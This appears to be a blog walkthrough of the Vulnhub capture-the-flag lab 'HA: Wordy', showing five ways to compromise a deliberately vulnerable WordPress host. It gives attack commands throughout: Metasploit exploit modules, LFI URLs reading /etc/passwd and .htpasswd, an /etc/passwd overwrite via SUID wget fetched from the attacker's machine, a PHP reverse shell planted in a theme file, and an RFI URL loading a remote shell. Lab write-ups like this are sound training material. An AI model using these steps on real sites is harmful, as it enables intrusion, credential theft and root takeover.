HA : Wordy Vulnhub Walkthrough


This is our Walkthrough for HA: Wordy” and this CTF is design by Hacking Articles Team 😊, hope you will enjoy.
The lab is designed for Beginners for WordPress Penetration Testing Practices. This lab is designed as a Capture the flag and not as a boot to root, but it contains multiple Vulnerabilities (OWASP Top-10) that should be exploited to complete this CTF Challenge. This helps the CTF player to understand all the ways in which a WordPress machine can be vulnerable.
Level: Easy
You can download this lab from here.
Penetration Testing Methodology
Network Scanning
·         Host IP (Netdiscover)
·         Open Port & Services (Nmap)
Enumeration
·         Web Directory Brute force (Dirb)
·         Scanning WordPress (Wpscan)
Exploiting Reflex Gallery (1st Method: file Upload)
·         Spawning Shell (Metasploit)
·         Capture the 1st flag
Privilege Escalation
·         Abusing SUID Binaries
·         Capture 2nd Flag
Exploiting Mail_Masta & WP_Support (2nd Method- LFI & CSRF)
·         LFI
·         CSRF
·         Capture the flag
·         Inject PHP malicious code
·         Spawning Shell (Netcat)
Exploiting WP_Symposium (3rd Method: SQL Injection)
·         Web Directory Enumeration (Dirb)
·         Obtaining Database Info (Metasploit)
Exploit Gwolle Guestbook (4th Method: RFI)
·         Inject PHP malicious code
·         Spawning Shell (Netcat)
Exploit Slideslow Gallery (5th Method: Authenticated File_Upload)
·         Spawning Shell (Metasploit)


Walkthrough
Starting with netdiscover, to identify host IP address and thus we found 192.168.0.27. let’s now go for advance network scanning using nmap aggressive scan.
nmap -A 192.168.0.27
We saw from the scan result that the port 80 open which is hosting Apache httpd service.

Since we got the port 80 open, we decided to browser the IP Address in the browser but found nothing.

Further we move for directory enumeration and use dirb for brute forcing.
This gave us a directory called “wordpress” as shown in the given image.


Upon finding the directory, we opened the URL in our browser.

Now that we have the wordpress site, it’s logical to perform a wpscan on our lab.
wpscan --url http://192.168.0.27/wordpress --enumerate p

Now we move further down in the wpscan result and found the reflex gallery plugin. It is vulnerable to the File Upload. As you can observe that it has shown Metasploit module for exploiting reflex gallery.

Exploiting Reflex Gallery (1st Method: File Upload )
Thus, we use the following module and set the argument such as rhosts and targeturi and then run the exploit to get the meterpreter session.
msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 > set rhosts 192.168.0.27
msf5 > set targeturi /wordpress
msf5 > exploit
Boom!! Here we have our meterpreter session which you can observe in the given below image.
meterpreter > shell
meterpreter >  python3 -c ‘import pty; pty.spawn(/”bin/sh”)’

Privilege Escalation
As soon as we gained the proper shell, we enumerated the machine for flags. We found flag1.txt in the /home/raj/ directory
cd /home
ls
cd raj
ls
cat flag1.tx
Now for privilege escalation It is a regular practice to check for any file having SUID permissions with the help of “Find” command. We used the following command to enumerate all binaries having SUID permissions:
find / -perm -u=s -type f 2>/dev/null
Find command shown that wget and cp command have the SUID permissions. This could be a possible for escalating root privilege.

SUID Binaries command gave us all the sensitive files that can be read/write and hence with the help of wget command we can overwrite the /etc/passwd.  
“To know more how to edit /etc/passwd file read Full-Article from article1 & article2”.
Now we are creating the salt value of password for our new user and this will be done by using “openssl” following command as mentioned in the screenshot below:
openssl passwd -1 -salt ignite pass123

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; This is going to help us create an entry of our user in the /etc/passwd file of the target machine. Now we have copied the entire content of /etc/passwd file as shown in the below image in our local machine.
cd /home/raj
cat /etc/passwd


After pasting above copied content, we will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.
cat /etc/passwd

Now we want to overwrite passwd file inside /etc folder to replace the original passwd file. We can use wget with -O to download the passwd file from our machine inside a /etc directory which will overwrite the existing passwd file.
cd /home/raj
cd /etc
wget -O passwd http://192.168.0.16:8000/passwd
Now when you check, you will see that the / etc / passwd file has been updated as shown in the image below.
tail /etc/passwd
Now let’s try to access root shell and we have to switch user as ignite for escalating privileges.
su ignite
cd /root
ls
cat proof.txt
Awesome!! We found the final flag along with root privileges. Let’s go for 2nd method……..

We can solve the lab using another method as well. Earlier our Wpscan showed us the Mail Masta plugin which is vulnerable to LFI (Local File Inclusion). On exploring the following link, we got proof-of-concept would be to load passwd file.
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

So, we framed our URL to exploit the LFI It turned out to be like this:
http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Now we browsed the URL in our browser to find the output of cat command on /etc/passwd file.

Now after some enumeration, we found that there are some credentials stored inside the /etc/apache2/.htpasswd. So, let’s read them using curl while exploiting LFI.

curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd
We were successful in obtaining a hash. It seemed like Base64 Encryption. We used the base64 command with -d parameter to decode this hash as shown in the image.
echo “YWFydGk6YWFydGlAZ21haWwuY29t” | base64 -d
It turned out to be aarti:aarti@gmail.com. This must be login details but there is no password.
 

Aarti is a member of wordpress and server user account. We can confirm this from our previous assessment of wpscan result. It shows 2 users admin and aarti.

CSRF:WP Support Plus Responsive Ticket
When we scanned wordpress with wpscan for vulnerable plugins, we found many of them and here, one by one we can exploit them to our desire. To do so, we will use searchsploit in order to find exploits for wp support as this was hinted to us during the said scan. Therefore, type the following for this:
searchsploit wp-support
searchsploit -m 41006
cat 41006.txt


Once the above commands are executed, we will now copy the highlighted content and modify it (as shown in the image below) to change username value to “aarti” and email value to “aarti@gmail.com” :
                Username:
               
               
               

As we execute the above script, the webpage will be directed to the log in screen; asking us the username, which we have already found.


Here, as soon as we click on login button, we will be logged in as a user without entering password because of incorrect usage of wp_set_auth_cookie() due to CSRF vulnerability.


While traversing the website we found a second flag and a root password in biographical info.


The password we found was encoded using base64 algorithm. To decrypt the password, we used the following command :
echo “SWduaXRlQDEyMw==”   |  base64 -d
Upon decryption we found the root password is Ignite@123. This is the password for the admin user in Wordpress.

Now, to proceed further we used the php reverse shell. We changed the IP Address to our current IP Address and give any port you want and start netcat listener for obtaining reverse connection.

And then we copied the above php-reverse-shell and paste it in 404.php template of wordpress as shown in the image below :

Then after saving the 404.php file we will run the file through URL in a browser as shown in the image below :


Simultaneously, when you run netcat, you will have your session upon execution of 404.php file. Access netcat using the following command :
nc -lvp 1234


Exploiting WP_Symposium (3rd Method: SQL Injection)
Enumeration
To further enumerate, we performed a Directory Bruteforce. There are a lot of situations where we need to extract the directories with specific extension over the target server, and for this we can use the -X parameter in dirb scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine. For instance, here we need to find text files, so we will use the following command for it :
dirb http://192.168.0.27  -X .txt


Among all the text files the message in notes.txt stood out. It said, “you need to zip your way out” and this message is obviously a hint to look for a zip file.

Now, again we will use dirb -X extension to find zip.
dirb http://192.168.0.27 -X .zip
Upon finding a zip file and then we download the file using the following wget and then unzip the command:
wget http://192.168.0.27/secret.zip
unzip secret.zip
To unzip the file successfully, you will need a password because it was a password protected zip file, but as we don’t know the said password, we will try to exploit a plugin.


We will use WordPress plugin wp-symposium version 15.5.1 which allows to retrieve all the database content, which includes users’ details and password.
Luckily, we found exploit for this vulnerability inside Metasploit framework and thus load the below module and execute following command
use auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27
msf auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress
msf auxiliary(wp_symposium_sql_injection) > exploit
Nice!!! Here we found the relevant username and email id as user: admin and aarti respectively.


Now will unzip the file we found earlier that is secret.zip with hash we found in wp-symposium exploit.
cat link.txt
As soon as we unzip the file, we found that this lab can be solved with multiple ways with the list of exploits.

Exploit Gwolle Guestbook (4th Method: RFI)

Now again we will run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).


We will follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We will copy it to desktop and rename it to wp-load.php. To execute our php shell using RFI we will start our python HTTP server to exploit RFI on the target machine.
mv php-reverse-shell.php shell.phpwp-load.php
python -m SimpleHTTPServer

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell.
http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php


Now we will exploit another vulnerable plugin that we found in secret.zip. The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.
Metasploit
You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute following command:
use exploit/unix/webapp/wp_slideshowgallery_upload
set targeturi /wordpress
set rhosts 192.168.0.27
set wp_user admin
set wp_password Ignite@123
exploit
As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a wordpress platformed website.



0 comments:

Post a Comment